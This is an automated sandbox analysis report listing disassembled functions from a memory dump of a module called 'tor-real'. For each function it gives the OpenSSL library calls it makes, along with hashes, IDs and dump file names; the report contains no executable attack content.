                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$Init
                                                                            • String ID: 0$3$@
                                                                            • API String ID: 2269640188-3913976845
                                                                            • Opcode ID: d8f1f58172e34481e00dfb9a13eb21230bcb6d73196ef5ef666d5bbc559f8aab
                                                                            • Instruction ID: c05ecf6b6b73acde5253891b36fdd79ebe67e77dcd99495a8ce56f4034f8b23b
                                                                            • Opcode Fuzzy Hash: d8f1f58172e34481e00dfb9a13eb21230bcb6d73196ef5ef666d5bbc559f8aab
                                                                            • Instruction Fuzzy Hash: 04B1F375A183418FD320CF29C88074AFBE2BFC9304F15892EE9D897351D775A949CB82
                                                                            Function 6C0D89E0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$P
                                                                            • API String ID: 0-307317852
                                                                            • Opcode ID: 73a34696da3a0000e6ee0b465405c958987030dc219cdf078a6e43bea3103dc6
                                                                            • Instruction ID: f7736c3e1bf1aece8fe40948f3c72d07833785b891add349a343c561af160ec9
                                                                            • Opcode Fuzzy Hash: 73a34696da3a0000e6ee0b465405c958987030dc219cdf078a6e43bea3103dc6
                                                                            • Instruction Fuzzy Hash: 5E9136B1609301CFE700DF29C484B5ABBE0BF45758F169AAEE8949B751D378E944CBC2
                                                                            Function 6C0C28A8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0C2785
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0C27A9
                                                                            • strcmp.MSVCRT ref: 6C0C281F
                                                                            • strlen.MSVCRT ref: 6C0C2960
                                                                              • Part of subcall function 6C0BB6F0: CRYPTO_zalloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,6C0A4C05), ref: 6C0BB731
                                                                              • Part of subcall function 6C0BB6F0: time.MSVCRT ref: 6C0BB762
                                                                              • Part of subcall function 6C0BB6F0: CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,6C0A4C05), ref: 6C0BB76E
                                                                              • Part of subcall function 6C0BB6F0: CRYPTO_new_ex_data.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,6C0A4C05), ref: 6C0BB796
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C2BAF
                                                                              • Part of subcall function 6C0B5600: memcpy.MSVCRT ref: 6C0B5628
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C29EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_cleanse$D_lock_newO_freeO_memdupO_new_ex_dataO_zallocmemcpystrcmpstrlentime
                                                                            • String ID: P
                                                                            • API String ID: 78333025-3110715001
                                                                            • Opcode ID: 668e0b0b51755587e71ae40f50ee34039fc9f6ff0170c50cd68ee7d6f05de278
                                                                            • Instruction ID: 808ccab5b6ac6d6b71e39f194722c5929af6b509d924568692be89de3edada68
                                                                            • Opcode Fuzzy Hash: 668e0b0b51755587e71ae40f50ee34039fc9f6ff0170c50cd68ee7d6f05de278
                                                                            • Instruction Fuzzy Hash: 5D5127B06093018FE710DF25C58839EB7F4BF84748F10992DE9989BB40EB75D948CB92
                                                                            Function 6C09A800 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A875
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_malloc
                                                                            • String ID: A$E$w
                                                                            • API String ID: 1457121658-3308909727
                                                                            • Opcode ID: 2cf9f226942742d29d1dd62f9ca335448657113652f6006049e097c478c7882a
                                                                            • Instruction ID: b76052f63bb8e163d86df6c29da57a46d3fbae044f2c41c6e39102f7261a6985
                                                                            • Opcode Fuzzy Hash: 2cf9f226942742d29d1dd62f9ca335448657113652f6006049e097c478c7882a
                                                                            • Instruction Fuzzy Hash: D75180B19087018FE7009F14C88478A7BE1BF81758F198A7CDC984F786C77AD885CB91
                                                                            Function 6C094A80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094AFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc
                                                                            • String ID: A$b
                                                                            • API String ID: 1208671065-3696090935
                                                                            • Opcode ID: 7d7997718295cb831d1cb203e9ef4899c1c022412919a67fafbbd53975656880
                                                                            • Instruction ID: 7480ef7e8fbe05c6c88a8618d7be5f49ad520194b4df20b31d00aa017d4a454e
                                                                            • Opcode Fuzzy Hash: 7d7997718295cb831d1cb203e9ef4899c1c022412919a67fafbbd53975656880
                                                                            • Instruction Fuzzy Hash: 324187716043018FDB048F69D48034ABBE2EFC5714F25C669E8688F759D7B6E845CB91
                                                                            Function 6C0B6E60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_freeO_mallocstrcpystrlen
                                                                            • String ID: A$P
                                                                            • API String ID: 2028745794-345673399
                                                                            • Opcode ID: 3fbfeff71c66f79f9b7922306804962f8047ea345618f220c4e8809975c6f50f
                                                                            • Instruction ID: 7d68c9b2ea8bb7cd7ba07a66c8b8997e9c21d4b5bfcf978d0e2fb1f87545f574
                                                                            • Opcode Fuzzy Hash: 3fbfeff71c66f79f9b7922306804962f8047ea345618f220c4e8809975c6f50f
                                                                            • Instruction Fuzzy Hash: 994107B56083558FC710DF64C48479AFBF0FF88308F15891EE998AB711E379E9498B52
                                                                            Function 6C0D4CA8 Relevance: 10.6, APIs: 7, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4C7B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4C83
                                                                              • Part of subcall function 6C0D4770: BIO_ctrl.LIBCRYPTO-1_1(?,?,?,6C0D5264), ref: 6C0D47C6
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0D4CB0
                                                                            • EVP_PKEY_size.LIBCRYPTO-1_1 ref: 6C0D4D10
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0D4D2C
                                                                            • EVP_DigestSignInit.LIBCRYPTO-1_1 ref: 6C0D4D5C
                                                                            • EVP_DigestSign.LIBCRYPTO-1_1 ref: 6C0D4DA9
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4E3B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4E43
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: DigestO_freeSignX_free$InitO_ctrlO_mallocX_newY_size
                                                                            • String ID:
                                                                            • API String ID: 1209551746-0
                                                                            • Opcode ID: 93d251d75d90fed00acf70b3d85f7d3bc17d2a00adb2049aaafe1b81b8665790
                                                                            • Instruction ID: 952b81d2de954fe4efb467bd6aa0f5330ea992fb720c7f455306072fa8413d8e
                                                                            • Opcode Fuzzy Hash: 93d251d75d90fed00acf70b3d85f7d3bc17d2a00adb2049aaafe1b81b8665790
                                                                            • Instruction Fuzzy Hash: AE41C0B0609301AFD300DF65C08076EBBF4BF89748F528A2EE4999B750E775E945CB82
                                                                            Function 6C0DEDBB Relevance: 10.6, APIs: 7, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ASN1_item_d2i.LIBCRYPTO-1_1 ref: 6C0DECC1
                                                                            • ASN1_TYPE_get.LIBCRYPTO-1_1 ref: 6C0DECDD
                                                                            • EVP_PKEY_decrypt.LIBCRYPTO-1_1 ref: 6C0DED32
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0DED8E
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0DEDA1
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0DEDB1
                                                                            • EVP_PKEY_new.LIBCRYPTO-1_1 ref: 6C0DEE16
                                                                            • EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0DEE34
                                                                            • EVP_PKEY_get0_DH.LIBCRYPTO-1_1 ref: 6C0DEE44
                                                                            • BN_bin2bn.LIBCRYPTO-1_1 ref: 6C0DEE60
                                                                            • DH_set0_key.LIBCRYPTO-1_1 ref: 6C0DEE8A
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DEEC3
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0DEEF6
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DEF7F
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DF336
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DF34B
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0DF5E7
                                                                            • BN_free.LIBCRYPTO-1_1 ref: 6C0DF88A
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DF892
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0DF8B6
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_CTX_new.LIBCRYPTO-1_1 ref: 6C0A3C02
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0A3C0C
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_derive_set_peer.LIBCRYPTO-1_1 ref: 6C0A3C20
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_derive.LIBCRYPTO-1_1 ref: 6C0A3C40
                                                                              • Part of subcall function 6C0A3BC0: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0A3C64
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_derive.LIBCRYPTO-1_1 ref: 6C0A3C7E
                                                                              • Part of subcall function 6C0A3BC0: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3D7F
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0A3D87
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DF961
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Y_free$O_clear_freeX_freeY_derive$E_getH_set0_keyN1_item_d2iN1_item_freeN_bin2bnN_freeO_freeO_mallocR_clear_errorX_ctrlX_newY_copy_parametersY_decryptY_derive_initY_derive_set_peerY_get0_Y_new
                                                                            • String ID:
                                                                            • API String ID: 2627696537-0
                                                                            • Opcode ID: b2dabd2655d79c8983e766d9ed17972c70ed086fdea29c2b6d8e4e7bc54f4bdd
                                                                            • Instruction ID: db81e9fb10ffed3093eef00b7146aab0e31f9940781d9d43cb3b695f9a6d5dc4
                                                                            • Opcode Fuzzy Hash: b2dabd2655d79c8983e766d9ed17972c70ed086fdea29c2b6d8e4e7bc54f4bdd
                                                                            • Instruction Fuzzy Hash: FA31F271A087459FD700DF25C4847AAFBE5BF88308F56C92DE8A89B750E734E4458B46
                                                                            Function 6C0E28F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,6C0E2AB4), ref: 6C0E291B
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,6C0E2AB4), ref: 6C0E2980
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0E2AB4), ref: 6C0E29E9
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0E2AB4), ref: 6C0E2A1F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$O_freeO_malloc
                                                                            • String ID: A
                                                                            • API String ID: 3400298158-3554254475
                                                                            • Opcode ID: d5769273611cdccc889799cf8b3e7d3bc85586aa2a5963d324b1f9e8aa859f9f
                                                                            • Instruction ID: 083743a486e8be833a4ea4c9d9b39c29fa729030f32274beaca08ec29ac16b53
                                                                            • Opcode Fuzzy Hash: d5769273611cdccc889799cf8b3e7d3bc85586aa2a5963d324b1f9e8aa859f9f
                                                                            • Instruction Fuzzy Hash: 633169B26483119FD310AF65D88539EBBE0FF89358F00D82DE5988BB20D7B694458B42
                                                                            Function 6C0D87E0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_mallocmemcpy
                                                                            • String ID: A$F$I$P
                                                                            • API String ID: 1834057931-352807779
                                                                            • Opcode ID: 760d75d0354e6aa1044f38a171c46653e6e7cf9417a701cc1501e3f5d2ddb01f
                                                                            • Instruction ID: ecd857cba42c7e0b34874559bc34568bfa5c517d16abe06e7e41cac91d7979e6
                                                                            • Opcode Fuzzy Hash: 760d75d0354e6aa1044f38a171c46653e6e7cf9417a701cc1501e3f5d2ddb01f
                                                                            • Instruction Fuzzy Hash: F1318DB4A042058FD708CF1AD184946FBE5FF88314F25C6AAED488B316D731E885CBA6
                                                                            Function 6C0ACAE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_init_crypto.LIBCRYPTO-1_1 ref: 6C0ACB14
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACB37
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBA6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_onceL_init_cryptoR_put_error
                                                                            • String ID: F
                                                                            • API String ID: 1977717042-1304234792
                                                                            • Opcode ID: 6a15361164aceb4267dc52fa8c9f4ed783292eabc4fb75a8d1a8081fd3eb3ccf
                                                                            • Instruction ID: 82ff82a7d7f6bba0e9070d85c496465a8375100020805e5de12e303711527294
                                                                            • Opcode Fuzzy Hash: 6a15361164aceb4267dc52fa8c9f4ed783292eabc4fb75a8d1a8081fd3eb3ccf
                                                                            • Instruction Fuzzy Hash: 362151B07193058FD700AFE5C58170B77F4AB8A788F05851DE9948BB52E733D4469F82
                                                                            Function 6C0CC919 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BN_num_bits.LIBCRYPTO-1_1 ref: 6C0CC939
                                                                              • Part of subcall function 6C094670: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0946A1
                                                                            • BN_bn2bin.LIBCRYPTO-1_1 ref: 6C0CC97F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CC9A3
                                                                            • CRYPTO_strdup.LIBCRYPTO-1_1 ref: 6C0CC9C7
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_bn2binN_num_bitsO_freeO_strdupO_zallocR_put_error
